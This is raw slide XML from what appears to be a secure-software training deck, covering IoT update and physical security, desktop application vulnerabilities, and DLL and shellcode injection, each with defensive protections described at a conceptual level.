            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>with data from untrusted source</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>yaml_safe.load </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>instead</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Slide Number Placeholder 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{630AF768-1C03-4D36-93BD-785B8AAFA105}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{A8160BDD-7155-D744-B749-9730458604AD}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>8</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="36999157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1" y="1302040"/>
            <a:ext cx="6625589" cy="4920960"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Plan for patches and updates to maintain the security of IoT devices over time. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Protect confidentiality, integrity, and availability when providing updates. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Make sure that IoT devices you release:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Can be updated quickly when vulnerabilities are discovered.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Use a VPN to protect connections to their controller.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Use a Secure Device Identity (DevID) to ensure the device identifier cannot be forged or transferred to another, unauthorized device.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Store keys in encrypted format.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Store telemetry or other collected data on a different, more secure platform such as the cloud or controller device.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Are updated through secure update servers.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Require updates to be signed (code signing) and verify those updates before installing them.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Discard updates that are not properly delivered or signed.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Provide a mechanism for issuing, updating, and revoking cryptographic keys as well.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Slide Number Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{A8160BDD-7155-D744-B749-9730458604AD}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>80</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Provide Secure Software/Firmware on IoT Devices</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3B85E4F5-A61F-409E-B64F-C7E2E675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514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1" y="1302040"/>
            <a:ext cx="6820874" cy="4920960"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>IoT devices should be protected from direct physical access by an attacker.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Make sure your devices:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Provide external ports (e.g., USB) only when absolutely essential.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Limit access to external ports (through an authentication process, for example).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Have operating systems that are properly protected.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Can be configured to limit administrative capabilities, preferably defaulting to least privilege.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Are tamper resistant.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Do not expose any testing or debugging interfaces that can be used to gain unauthorized access.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Account for the transfer of ownership of devices to ensure that data is not transferred along with the ownership.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Slide Number Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{A8160BDD-7155-D744-B749-9730458604AD}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>81</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Physically Secure IoT Devices</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1121664"/>
            <a:ext cx="1371600" cy="1400835"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 8" descr="Image result for checklist png">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4A318135-3737-498A-B0A3-780E6BBE5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5764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407642" y="1167350"/>
            <a:ext cx="2394433" cy="1728250"/>
            <a:chOff x="152400" y="1302040"/>
            <a:chExt cx="1828801" cy="1319989"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="7"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grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Slide Number Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{A8160BDD-7155-D744-B749-9730458604AD}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>82</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Desktop applications:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Run on systems as:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Windows Desktop (Win32, UWP, and so forth)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Mac OS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Linux desktop</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Often include many of the same features as mobile and web apps.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Use the same cloud services, functioning as a client app or front-end.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Share many of the same vulnerabilities as mobile and web apps.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Don't run within a web browser.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Not prone to certain types of web vulnerabilities, such as cross-site scripting and clickjacking.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>May incorporate web view controls.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Adds web browser behavior to the application.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>May enable some types of web vulnerabilities if implemented improperly.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>May have vulnerabilities such as:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Problems common to multi-tier applications</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Application running with excessive privileges</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Unsecure storage of sensitive data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Reverse engineering</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Buffer overruns</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Desktop Application Vulnerabilities</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3418158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83</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Because desktop application executable code can be directly accessed and modified by an attacker, it can be directly modified by an attacker. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Dynamic link libraries (DLLs):</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Typically contain code that performs special work such as data encryption and image or audio processing.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Many desktop applications are made up of multiple modules of executable code, such as DLLs.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>DLL injection attack </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Tricks the main process into using a different DLL than the one intended by the software developer.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The replacement DLL:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Runs in the security context of the target process.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Can do anything the process has the authorization to do.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Must duplicate the programming interface of the original DLL, providing functions and parameters the main process requires.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Can be a reverse-engineered copy of the original DLL with malware added.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Can be inserted on victim's computer through various vulnerabilities or directly if attacker has physical access.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>DLL Injection (Slide 1 of 2)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3748947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84</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Once the DLL is injected, the attacker can perform attacks, such as leaking sensitive data, performing a Denial of Service attack, or performing illicit transactions.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Can be protected against by:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Signing DLLs with a checksum or hash that is verified before they run. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Closing security defects that enable DLL injection.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Specific techniques for the various operating systems and programming environments.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>DLL Injection (Slide 2 of 2)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3591405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85</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>To accomplish certain tasks, desktop applications may spawn a shell process:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Starts a command shell through which application can issue system commands.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>May be hijacked by a remote attacker to submit commands to the operating system.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>To find in source code, look for functions that start processes or commands.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Example: Windows API </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ShellExecute</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ShellExecuteEx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> functions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Protections:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Completely avoid using any shell commands. Instead use protected APIs and libraries to indirectly accomplish system tasks. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Avoid constructing shell commands dynamically from user-provided or remote input sources. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Pay attention to warnings against this vulnerability from the compiler and static analysis tools.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Shellcode Injection (Slide 1 of 2)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3107151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86</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Shellcode Injection (Slide 2 of 2)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="9" name="Group 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8D0580FD-DBD0-41E1-9324-75F0712C26D5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457428" y="1035270"/>
            <a:ext cx="7652761" cy="5410200"/>
            <a:chOff x="1181676" y="723900"/>
            <a:chExt cx="7652761" cy="5410200"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="10" name="Picture 9">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2783868F-E15E-4C26-823F-A396AA45FE46}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId2"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="3357562" y="723900"/>
              <a:ext cx="5476875" cy="5410200"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="AutoShape 303">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CE77D58A-7690-4665-A31A-2C614BF19D0C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipH="1">
              <a:off x="2905702" y="4459856"/>
              <a:ext cx="451860" cy="1674244"/>
            </a:xfrm>
            <a:prstGeom prst="rightBrace">
              <a:avLst>
                <a:gd name="adj1" fmla="val 6590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AutoShape 303">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DBDE2E0F-73E7-4E24-A4C1-249705CB698D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipH="1">
              <a:off x="2905702" y="2777705"/>
              <a:ext cx="451860" cy="1337095"/>
            </a:xfrm>
            <a:prstGeom prst="rightBrace">
              <a:avLst>
                <a:gd name="adj1" fmla="val 6590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ounded Rectangle 51">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CF94D3A4-8F7D-4BB2-81FC-FC36E613EB0B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1181677" y="3011874"/>
              <a:ext cx="1724025" cy="83425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Identify a trusted Windows process to compromise</a:t>
              </a:r>
            </a:p>
